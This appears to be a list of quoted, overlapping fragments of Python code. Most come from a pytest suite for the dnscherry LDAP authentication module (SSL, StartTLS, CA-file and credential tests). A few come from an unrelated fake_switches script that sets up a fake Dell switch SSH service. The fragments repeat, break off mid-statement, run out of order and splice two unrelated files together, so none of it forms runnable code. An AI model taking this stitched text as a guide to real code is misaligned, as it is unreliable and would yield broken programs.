"def testConnectSSLWrongCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv =",
"= inv.check_credentials('notauser', 'password') or inv.check_credentials('jwatson', '<PASSWORD>') assert res == False def testMissingParam(self): cfg2",
"= inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) return True def testConnectSSL(self): cfg2 = cfg.copy() cfg2['uri'] =",
"'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword)",
"inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() except CaFileDontExist as e: return def",
"e: return def testMissingCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on'",
"= 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() try:",
"not match CN in peer certificate' def testConnectStartTLS(self): cfg2 = cfg.copy() cfg2['uri'] =",
"'auth.ldap.module': 'dnscherry.backend.ldap', 'auth.ldap.groupdn': 'ou=groups,dc=example,dc=org', 'auth.ldap.userdn': 'ou=People,dc=example,dc=org', 'auth.ldap.binddn': 'cn=dnscherry,dc=example,dc=org', 'auth.ldap.bindpassword': 'password', 'auth.ldap.uri': 'ldap://ldap.dnscherry.org:389', 'auth.ldap.ca':",
"cfg2['ca'] = './test/cfg/ca.crt' inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) def",
"'ldap://ldap.dnscherry.org:389', 'auth.ldap.ca': './tests/test_env/etc/dnscherry/TEST-cacert.pem', 'auth.ldap.starttls': 'off', 'auth.ldap.checkcert': 'off', 'auth.ldap.user.filter.tmpl': '(uid=%(login)s)', 'auth.ldap.group.filter.tmpl': '(member=%(userdn)s)', 'auth.ldap.dn_user_attr': 'uid',",
"CaFileDontExist as e: return def testConnectSSLWrongCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert']",
"utf-8 -*- from __future__ import with_statement from __future__ import unicode_literals import pytest import",
"cfg2 = cfg.copy() cfg2['uri'] = 'ldap://ldap.dnscherry.org:390' cfg2['checkcert'] = 'off' cfg2['starttls'] = 'on' cfg2['ca']",
"'shell', 'cn', 'uid', 'uidNumber', 'gidNumber', 'home', 'userPassword', 'givenName', 'email', 'sn'] class TestError(object): def",
"Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testConnect(self): inv = Auth(cfg, cherrypy.log)",
"'auth.ldap.checkcert': 'off', 'auth.ldap.user.filter.tmpl': '(uid=%(login)s)', 'auth.ldap.group.filter.tmpl': '(member=%(userdn)s)', 'auth.ldap.dn_user_attr': 'uid', 'auth.ldap.group_attr.member': \"%(dn)s\", 'auth.ldap.timeout': 10, }",
"= cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' cfg2['ca'] = './test/cfg/not_a_ca.crt' try: inv",
"== 'TLS: hostname does not match CN in peer certificate' def testConnectStartTLS(self): cfg2",
"'dnscherry.backend.ldap', 'auth.ldap.groupdn': 'ou=groups,dc=example,dc=org', 'auth.ldap.userdn': 'ou=People,dc=example,dc=org', 'auth.ldap.binddn': 'cn=dnscherry,dc=example,dc=org', 'auth.ldap.bindpassword': 'password', 'auth.ldap.uri': 'ldap://ldap.dnscherry.org:389', 'auth.ldap.ca': './tests/test_env/etc/dnscherry/TEST-cacert.pem',",
"cfg2 = {} return True try: inv = Auth(cfg2, cherrypy.log) except MissingKey: return",
"'uid', 'uidNumber', 'gidNumber', 'home', 'userPassword', 'givenName', 'email', 'sn'] class TestError(object): def testNominal(self): inv",
"= 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' cfg2['ca'] = './test/cfg/not_a_ca.crt' try: inv = Auth(cfg2, cherrypy.log)",
"import pytest import sys from sets import Set from dnscherry.auth.modLdap import Auth, CaFileDontExist",
"cherrypy.log) try: ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: return def",
"from sets import Set from dnscherry.auth.modLdap import Auth, CaFileDontExist import cherrypy import logging",
"inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testConnect(self): inv = Auth(cfg, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn,",
"'auth.ldap.starttls': 'off', 'auth.ldap.checkcert': 'off', 'auth.ldap.user.filter.tmpl': '(uid=%(login)s)', 'auth.ldap.group.filter.tmpl': '(member=%(userdn)s)', 'auth.ldap.dn_user_attr': 'uid', 'auth.ldap.group_attr.member': \"%(dn)s\", 'auth.ldap.timeout':",
"context='', severity=logging.INFO, traceback=False): pass cherrypy.log.error = syslog_error attr = ['shéll', 'shell', 'cn', 'uid',",
"cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) try: ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword)",
"inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) def testAuthSuccess(self): inv = Auth(cfg, cherrypy.log) ret = inv.check_credentials('jwatson', '<PASSWORD>')",
"False def testMissingParam(self): cfg2 = {} return True try: inv = Auth(cfg2, cherrypy.log)",
"import Set from dnscherry.auth.modLdap import Auth, CaFileDontExist import cherrypy import logging import ldap",
"ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testConnect(self): inv = Auth(cfg, cherrypy.log) ldap =",
"return True def testConnectSSL(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on'",
"ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) return True def testConnectSSL(self): cfg2 = cfg.copy() cfg2['uri']",
"cfg2['checkcert'] = 'on' cfg2['ca'] = './test/cfg/not_a_ca.crt' try: inv = Auth(cfg2, cherrypy.log) ldapc =",
"\"%(dn)s\", 'auth.ldap.timeout': 10, } def syslog_error(msg='', context='', severity=logging.INFO, traceback=False): pass cherrypy.log.error = syslog_error",
"'cn', 'uid', 'uidNumber', 'gidNumber', 'home', 'userPassword', 'givenName', 'email', 'sn'] class TestError(object): def testNominal(self):",
"'auth.ldap.uri': 'ldap://ldap.dnscherry.org:389', 'auth.ldap.ca': './tests/test_env/etc/dnscherry/TEST-cacert.pem', 'auth.ldap.starttls': 'off', 'auth.ldap.checkcert': 'off', 'auth.ldap.user.filter.tmpl': '(uid=%(login)s)', 'auth.ldap.group.filter.tmpl': '(member=%(userdn)s)', 'auth.ldap.dn_user_attr':",
"cfg.copy() cfg2['uri'] = 'ldap://ldap.dnscherry.org:390' cfg2['checkcert'] = 'off' cfg2['starttls'] = 'on' cfg2['ca'] = './test/cfg/ca.crt'",
"Auth(cfg, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) return True def testConnectSSL(self): cfg2 =",
"try: inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() except CaFileDontExist as e: return",
"inv = Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testConnect(self): inv =",
"def testAuthFailure(self): inv = Auth(cfg, cherrypy.log) res = inv.check_credentials('notauser', 'password') or inv.check_credentials('jwatson', '<PASSWORD>')",
"cherrypy.log) ret = inv.check_credentials('jwatson', '<PASSWORD>') assert ret == True def testAuthFailure(self): inv =",
"'auth.ldap.group.filter.tmpl': '(member=%(userdn)s)', 'auth.ldap.dn_user_attr': 'uid', 'auth.ldap.group_attr.member': \"%(dn)s\", 'auth.ldap.timeout': 10, } def syslog_error(msg='', context='', severity=logging.INFO,",
"'(member=%(userdn)s)', 'auth.ldap.dn_user_attr': 'uid', 'auth.ldap.group_attr.member': \"%(dn)s\", 'auth.ldap.timeout': 10, } def syslog_error(msg='', context='', severity=logging.INFO, traceback=False):",
"'./tests/test_env/etc/dnscherry/TEST-cacert.pem', 'auth.ldap.starttls': 'off', 'auth.ldap.checkcert': 'off', 'auth.ldap.user.filter.tmpl': '(uid=%(login)s)', 'auth.ldap.group.filter.tmpl': '(member=%(userdn)s)', 'auth.ldap.dn_user_attr': 'uid', 'auth.ldap.group_attr.member': \"%(dn)s\",",
"return True def testConnectSSLNoCheck(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'off'",
"cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' cfg2['ca'] = './test/cfg/not_a_ca.crt' try: inv =",
"= inv._connect() except CaFileDontExist as e: return def testConnectSSLWrongCA(self): cfg2 = cfg.copy() cfg2['uri']",
"import with_statement from __future__ import unicode_literals import pytest import sys from sets import",
"attr = ['shéll', 'shell', 'cn', 'uid', 'uidNumber', 'gidNumber', 'home', 'userPassword', 'givenName', 'email', 'sn']",
"= Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testConnect(self): inv = Auth(cfg,",
"= 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn,",
"= 'on' inv = Auth(cfg2, cherrypy.log) try: ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except",
"try: ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: assert e[0]['info'] == 'TLS: hostname does",
"-*- from __future__ import with_statement from __future__ import unicode_literals import pytest import sys",
"ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: return def testMissingCA(self): cfg2",
"= cfg.copy() cfg2['uri'] = 'ldaps://notaldap:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) try:",
"= inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) def testAuthSuccess(self): inv = Auth(cfg, cherrypy.log) ret = inv.check_credentials('jwatson',",
"'auth.ldap.timeout': 10, } def syslog_error(msg='', context='', severity=logging.INFO, traceback=False): pass cherrypy.log.error = syslog_error attr",
"True def testConnectSSLNoCheck(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'off' inv",
"ret = inv.check_credentials('jwatson', '<PASSWORD>') assert ret == True def testAuthFailure(self): inv = Auth(cfg,",
"ldap.SERVER_DOWN as e: return def testMissingCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert']",
"inv.check_credentials('jwatson', '<PASSWORD>') assert res == False def testMissingParam(self): cfg2 = {} return True",
"syslog_error attr = ['shéll', 'shell', 'cn', 'uid', 'uidNumber', 'gidNumber', 'home', 'userPassword', 'givenName', 'email',",
"'ou=People,dc=example,dc=org', 'auth.ldap.binddn': 'cn=dnscherry,dc=example,dc=org', 'auth.ldap.bindpassword': 'password', 'auth.ldap.uri': 'ldap://ldap.dnscherry.org:389', 'auth.ldap.ca': './tests/test_env/etc/dnscherry/TEST-cacert.pem', 'auth.ldap.starttls': 'off', 'auth.ldap.checkcert': 'off',",
"sys from sets import Set from dnscherry.auth.modLdap import Auth, CaFileDontExist import cherrypy import",
"'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() try: ldapc.simple_bind_s(inv.binddn,",
"assert ret == True def testAuthFailure(self): inv = Auth(cfg, cherrypy.log) res = inv.check_credentials('notauser',",
"Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testLdapUnavaible(self): cfg2 = cfg.copy() cfg2['uri']",
"ldap.simple_bind_s(inv.binddn, inv.bindpassword) return True def testConnectSSL(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert']",
"ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testConnect(self): inv = Auth(cfg, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword)",
"testConnectSSLNoCheck(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'off' inv = Auth(cfg2,",
"except CaFileDontExist as e: return def testConnectSSLWrongCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636'",
"as e: return def testConnectSSLWrongCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] =",
"= 'off' cfg2['starttls'] = 'on' cfg2['ca'] = './test/cfg/ca.crt' inv = Auth(cfg2, cherrypy.log) ldapc",
"= Auth(cfg2, cherrypy.log) ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) def testAuthSuccess(self): inv = Auth(cfg,",
"= Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testLdapUnavaible(self): cfg2 = cfg.copy()",
"== False def testMissingParam(self): cfg2 = {} return True try: inv = Auth(cfg2,",
"def testMissingCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' cfg2['ca'] =",
"{ 'auth.ldap.module': 'dnscherry.backend.ldap', 'auth.ldap.groupdn': 'ou=groups,dc=example,dc=org', 'auth.ldap.userdn': 'ou=People,dc=example,dc=org', 'auth.ldap.binddn': 'cn=dnscherry,dc=example,dc=org', 'auth.ldap.bindpassword': 'password', 'auth.ldap.uri': 'ldap://ldap.dnscherry.org:389',",
"'home', 'userPassword', 'givenName', 'email', 'sn'] class TestError(object): def testNominal(self): inv = Auth(cfg, cherrypy.log)",
"10, } def syslog_error(msg='', context='', severity=logging.INFO, traceback=False): pass cherrypy.log.error = syslog_error attr =",
"ldap.SERVER_DOWN as e: assert e[0]['info'] == 'TLS: hostname does not match CN in",
"ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) def testAuthSuccess(self): inv = Auth(cfg, cherrypy.log) ret =",
"ldap cfg = { 'auth.ldap.module': 'dnscherry.backend.ldap', 'auth.ldap.groupdn': 'ou=groups,dc=example,dc=org', 'auth.ldap.userdn': 'ou=People,dc=example,dc=org', 'auth.ldap.binddn': 'cn=dnscherry,dc=example,dc=org', 'auth.ldap.bindpassword':",
"ldapc = inv._connect() except CaFileDontExist as e: return def testConnectSSLWrongCA(self): cfg2 = cfg.copy()",
"assert res == False def testMissingParam(self): cfg2 = {} return True try: inv",
"'auth.ldap.userdn': 'ou=People,dc=example,dc=org', 'auth.ldap.binddn': 'cn=dnscherry,dc=example,dc=org', 'auth.ldap.bindpassword': 'password', 'auth.ldap.uri': 'ldap://ldap.dnscherry.org:389', 'auth.ldap.ca': './tests/test_env/etc/dnscherry/TEST-cacert.pem', 'auth.ldap.starttls': 'off', 'auth.ldap.checkcert':",
"import logging import ldap cfg = { 'auth.ldap.module': 'dnscherry.backend.ldap', 'auth.ldap.groupdn': 'ou=groups,dc=example,dc=org', 'auth.ldap.userdn': 'ou=People,dc=example,dc=org',",
"cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log)",
"'auth.ldap.user.filter.tmpl': '(uid=%(login)s)', 'auth.ldap.group.filter.tmpl': '(member=%(userdn)s)', 'auth.ldap.dn_user_attr': 'uid', 'auth.ldap.group_attr.member': \"%(dn)s\", 'auth.ldap.timeout': 10, } def syslog_error(msg='',",
"'auth.ldap.dn_user_attr': 'uid', 'auth.ldap.group_attr.member': \"%(dn)s\", 'auth.ldap.timeout': 10, } def syslog_error(msg='', context='', severity=logging.INFO, traceback=False): pass",
"'auth.ldap.bindpassword': 'password', 'auth.ldap.uri': 'ldap://ldap.dnscherry.org:389', 'auth.ldap.ca': './tests/test_env/etc/dnscherry/TEST-cacert.pem', 'auth.ldap.starttls': 'off', 'auth.ldap.checkcert': 'off', 'auth.ldap.user.filter.tmpl': '(uid=%(login)s)', 'auth.ldap.group.filter.tmpl':",
"def testConnect(self): inv = Auth(cfg, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) return True",
"try: ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: return def testMissingCA(self):",
"cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() try: ldapc.simple_bind_s(inv.binddn, inv.bindpassword)",
"testAuthSuccess(self): inv = Auth(cfg, cherrypy.log) ret = inv.check_credentials('jwatson', '<PASSWORD>') assert ret == True",
"Auth(cfg, cherrypy.log) ret = inv.check_credentials('jwatson', '<PASSWORD>') assert ret == True def testAuthFailure(self): inv",
"'ou=groups,dc=example,dc=org', 'auth.ldap.userdn': 'ou=People,dc=example,dc=org', 'auth.ldap.binddn': 'cn=dnscherry,dc=example,dc=org', 'auth.ldap.bindpassword': 'password', 'auth.ldap.uri': 'ldap://ldap.dnscherry.org:389', 'auth.ldap.ca': './tests/test_env/etc/dnscherry/TEST-cacert.pem', 'auth.ldap.starttls': 'off',",
"= Auth(cfg, cherrypy.log) res = inv.check_credentials('notauser', 'password') or inv.check_credentials('jwatson', '<PASSWORD>') assert res ==",
"from dnscherry.auth.modLdap import Auth, CaFileDontExist import cherrypy import logging import ldap cfg =",
"import cherrypy import logging import ldap cfg = { 'auth.ldap.module': 'dnscherry.backend.ldap', 'auth.ldap.groupdn': 'ou=groups,dc=example,dc=org',",
"cherrypy.log) return True def testConnectSSLNoCheck(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] =",
"= Auth(cfg, cherrypy.log) return True def testConnectSSLNoCheck(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636'",
"'uidNumber', 'gidNumber', 'home', 'userPassword', 'givenName', 'email', 'sn'] class TestError(object): def testNominal(self): inv =",
"Auth, CaFileDontExist import cherrypy import logging import ldap cfg = { 'auth.ldap.module': 'dnscherry.backend.ldap',",
"cherrypy import logging import ldap cfg = { 'auth.ldap.module': 'dnscherry.backend.ldap', 'auth.ldap.groupdn': 'ou=groups,dc=example,dc=org', 'auth.ldap.userdn':",
"'auth.ldap.ca': './tests/test_env/etc/dnscherry/TEST-cacert.pem', 'auth.ldap.starttls': 'off', 'auth.ldap.checkcert': 'off', 'auth.ldap.user.filter.tmpl': '(uid=%(login)s)', 'auth.ldap.group.filter.tmpl': '(member=%(userdn)s)', 'auth.ldap.dn_user_attr': 'uid', 'auth.ldap.group_attr.member':",
"except ldap.SERVER_DOWN as e: return def testMissingCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636'",
"'on' cfg2['ca'] = './test/cfg/not_a_ca.crt' try: inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() except",
"inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) return True def testConnectSSL(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636'",
"} def syslog_error(msg='', context='', severity=logging.INFO, traceback=False): pass cherrypy.log.error = syslog_error attr = ['shéll',",
"cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) ldap = inv._connect()",
"inv = Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testLdapUnavaible(self): cfg2 =",
"testLdapUnavaible(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://notaldap:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2,",
"'on' cfg2['ca'] = './test/cfg/ca.crt' inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword)",
"= Auth(cfg, cherrypy.log) ret = inv.check_credentials('jwatson', '<PASSWORD>') assert ret == True def testAuthFailure(self):",
"ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: return def testMissingCA(self): cfg2 = cfg.copy() cfg2['uri']",
"-*- coding: utf-8 -*- from __future__ import with_statement from __future__ import unicode_literals import",
"or inv.check_credentials('jwatson', '<PASSWORD>') assert res == False def testMissingParam(self): cfg2 = {} return",
"True def testConnectSSL(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv",
"inv.check_credentials('notauser', 'password') or inv.check_credentials('jwatson', '<PASSWORD>') assert res == False def testMissingParam(self): cfg2 =",
"coding: utf-8 -*- from __future__ import with_statement from __future__ import unicode_literals import pytest",
"= './test/cfg/ca.crt' inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) def testAuthSuccess(self):",
"= Auth(cfg, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) return True def testConnectSSL(self): cfg2",
"= cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) ldapc",
"'ldaps://notaldap:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) try: ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn,",
"'gidNumber', 'home', 'userPassword', 'givenName', 'email', 'sn'] class TestError(object): def testNominal(self): inv = Auth(cfg,",
"= './test/cfg/not_a_ca.crt' try: inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() except CaFileDontExist as",
"pytest import sys from sets import Set from dnscherry.auth.modLdap import Auth, CaFileDontExist import",
"cfg.copy() cfg2['uri'] = 'ldaps://notaldap:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) try: ldapc",
"testAuthFailure(self): inv = Auth(cfg, cherrypy.log) res = inv.check_credentials('notauser', 'password') or inv.check_credentials('jwatson', '<PASSWORD>') assert",
"Set from dnscherry.auth.modLdap import Auth, CaFileDontExist import cherrypy import logging import ldap cfg",
"return def testMissingCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' cfg2['ca']",
"cfg2['ca'] = './test/cfg/not_a_ca.crt' try: inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() except CaFileDontExist",
"cherrypy.log) ldapc = inv._connect() except CaFileDontExist as e: return def testConnectSSLWrongCA(self): cfg2 =",
"match CN in peer certificate' def testConnectStartTLS(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldap://ldap.dnscherry.org:390'",
"from __future__ import with_statement from __future__ import unicode_literals import pytest import sys from",
"cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) ldap =",
"cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'off' inv = Auth(cfg2, cherrypy.log) ldap = inv._connect()",
"assert e[0]['info'] == 'TLS: hostname does not match CN in peer certificate' def",
"certificate' def testConnectStartTLS(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldap://ldap.dnscherry.org:390' cfg2['checkcert'] = 'off' cfg2['starttls']",
"= 'off' inv = Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testConnect(self):"
] |
[
"self._access_vlan != value: self._access_vlan = value print(\"This could add vlan to eth0\") if",
"CustomPort(\"Eth1/24\"), CustomPort(\"Eth1/25\"), CustomPort(\"Eth1/26\"), CustomPort(\"Eth1/27\"), CustomPort(\"Eth1/28\"), CustomPort(\"Eth1/29\"), CustomPort(\"Eth1/30\"), CustomPort(\"Eth1/31\"), CustomPort(\"Eth1/32\"), CustomPort(\"mgmt0\"), CustomPort(\"Lo0\"), ]))) ssh_service.hook_to_reactor(reactor)",
"import SwitchSshService from fake_switches.dell.dell_core import DellSwitchCore class CustomSwitchConfiguration(SwitchConfiguration): def __init__(self, *args, **kwargs): super(CustomSwitchConfiguration,",
"import SwitchConfiguration, Port from fake_switches.transports.ssh_service import SwitchSshService from fake_switches.dell.dell_core import DellSwitchCore class CustomSwitchConfiguration(SwitchConfiguration):",
"'__main__': ssh_service = SwitchSshService( ip=\"127.0.0.1\", port=11001, switch_core=DellSwitchCore(CustomSwitchConfiguration(\"127.0.0.1\", \"NEXT-TEST\", ports=[ CustomPort(\"Eth1/1\"), CustomPort(\"Eth1/2\"), CustomPort(\"Eth1/3\"), CustomPort(\"Eth1/4\"),",
"super(CustomPort, self).__init__(name) @property def access_vlan(self): return self._access_vlan @access_vlan.setter def access_vlan(self, value): if self._access_vlan",
"access_vlan(self): return self._access_vlan @access_vlan.setter def access_vlan(self, value): if self._access_vlan != value: self._access_vlan =",
"CustomPort(\"Eth1/5\"), CustomPort(\"Eth1/6\"), CustomPort(\"Eth1/7\"), CustomPort(\"Eth1/8\"), CustomPort(\"Eth1/9\"), CustomPort(\"Eth1/10\"), CustomPort(\"Eth1/11\"), CustomPort(\"Eth1/12\"), CustomPort(\"Eth1/13\"), CustomPort(\"Eth1/14\"), CustomPort(\"Eth1/15\"), CustomPort(\"Eth1/16\"), CustomPort(\"Eth1/17\"),",
"value: self._access_vlan = value print(\"This could add vlan to eth0\") if __name__ ==",
"CustomPort(\"Eth1/4\"), CustomPort(\"Eth1/5\"), CustomPort(\"Eth1/6\"), CustomPort(\"Eth1/7\"), CustomPort(\"Eth1/8\"), CustomPort(\"Eth1/9\"), CustomPort(\"Eth1/10\"), CustomPort(\"Eth1/11\"), CustomPort(\"Eth1/12\"), CustomPort(\"Eth1/13\"), CustomPort(\"Eth1/14\"), CustomPort(\"Eth1/15\"), CustomPort(\"Eth1/16\"),",
"if self._access_vlan != value: self._access_vlan = value print(\"This could add vlan to eth0\")",
"CustomPort(\"Eth1/3\"), CustomPort(\"Eth1/4\"), CustomPort(\"Eth1/5\"), CustomPort(\"Eth1/6\"), CustomPort(\"Eth1/7\"), CustomPort(\"Eth1/8\"), CustomPort(\"Eth1/9\"), CustomPort(\"Eth1/10\"), CustomPort(\"Eth1/11\"), CustomPort(\"Eth1/12\"), CustomPort(\"Eth1/13\"), CustomPort(\"Eth1/14\"), CustomPort(\"Eth1/15\"),",
"CustomPort(Port): def __init__(self, name): self._access_vlan = None super(CustomPort, self).__init__(name) @property def access_vlan(self): return",
"@property def access_vlan(self): return self._access_vlan @access_vlan.setter def access_vlan(self, value): if self._access_vlan != value:",
"__init__(self, name): self._access_vlan = None super(CustomPort, self).__init__(name) @property def access_vlan(self): return self._access_vlan @access_vlan.setter",
"if __name__ == '__main__': ssh_service = SwitchSshService( ip=\"127.0.0.1\", port=11001, switch_core=DellSwitchCore(CustomSwitchConfiguration(\"127.0.0.1\", \"NEXT-TEST\", ports=[ CustomPort(\"Eth1/1\"),",
"CustomPort(\"Eth1/15\"), CustomPort(\"Eth1/16\"), CustomPort(\"Eth1/17\"), CustomPort(\"Eth1/18\"), CustomPort(\"Eth1/19\"), CustomPort(\"Eth1/20\"), CustomPort(\"Eth1/21\"), CustomPort(\"Eth1/22\"), CustomPort(\"Eth1/23\"), CustomPort(\"Eth1/24\"), CustomPort(\"Eth1/25\"), CustomPort(\"Eth1/26\"), CustomPort(\"Eth1/27\"),",
"CustomPort(\"Eth1/12\"), CustomPort(\"Eth1/13\"), CustomPort(\"Eth1/14\"), CustomPort(\"Eth1/15\"), CustomPort(\"Eth1/16\"), CustomPort(\"Eth1/17\"), CustomPort(\"Eth1/18\"), CustomPort(\"Eth1/19\"), CustomPort(\"Eth1/20\"), CustomPort(\"Eth1/21\"), CustomPort(\"Eth1/22\"), CustomPort(\"Eth1/23\"), CustomPort(\"Eth1/24\"),",
"fake_switches.dell.dell_core import DellSwitchCore class CustomSwitchConfiguration(SwitchConfiguration): def __init__(self, *args, **kwargs): super(CustomSwitchConfiguration, self).__init__(objects_overrides={\"Port\": CustomPort}, *args,",
"= value print(\"This could add vlan to eth0\") if __name__ == '__main__': ssh_service",
"from fake_switches.dell.dell_core import DellSwitchCore class CustomSwitchConfiguration(SwitchConfiguration): def __init__(self, *args, **kwargs): super(CustomSwitchConfiguration, self).__init__(objects_overrides={\"Port\": CustomPort},",
"ssh_service = SwitchSshService( ip=\"127.0.0.1\", port=11001, switch_core=DellSwitchCore(CustomSwitchConfiguration(\"127.0.0.1\", \"NEXT-TEST\", ports=[ CustomPort(\"Eth1/1\"), CustomPort(\"Eth1/2\"), CustomPort(\"Eth1/3\"), CustomPort(\"Eth1/4\"), CustomPort(\"Eth1/5\"),",
"__name__ == '__main__': ssh_service = SwitchSshService( ip=\"127.0.0.1\", port=11001, switch_core=DellSwitchCore(CustomSwitchConfiguration(\"127.0.0.1\", \"NEXT-TEST\", ports=[ CustomPort(\"Eth1/1\"), CustomPort(\"Eth1/2\"),",
"self._access_vlan = value print(\"This could add vlan to eth0\") if __name__ == '__main__':",
"== '__main__': ssh_service = SwitchSshService( ip=\"127.0.0.1\", port=11001, switch_core=DellSwitchCore(CustomSwitchConfiguration(\"127.0.0.1\", \"NEXT-TEST\", ports=[ CustomPort(\"Eth1/1\"), CustomPort(\"Eth1/2\"), CustomPort(\"Eth1/3\"),",
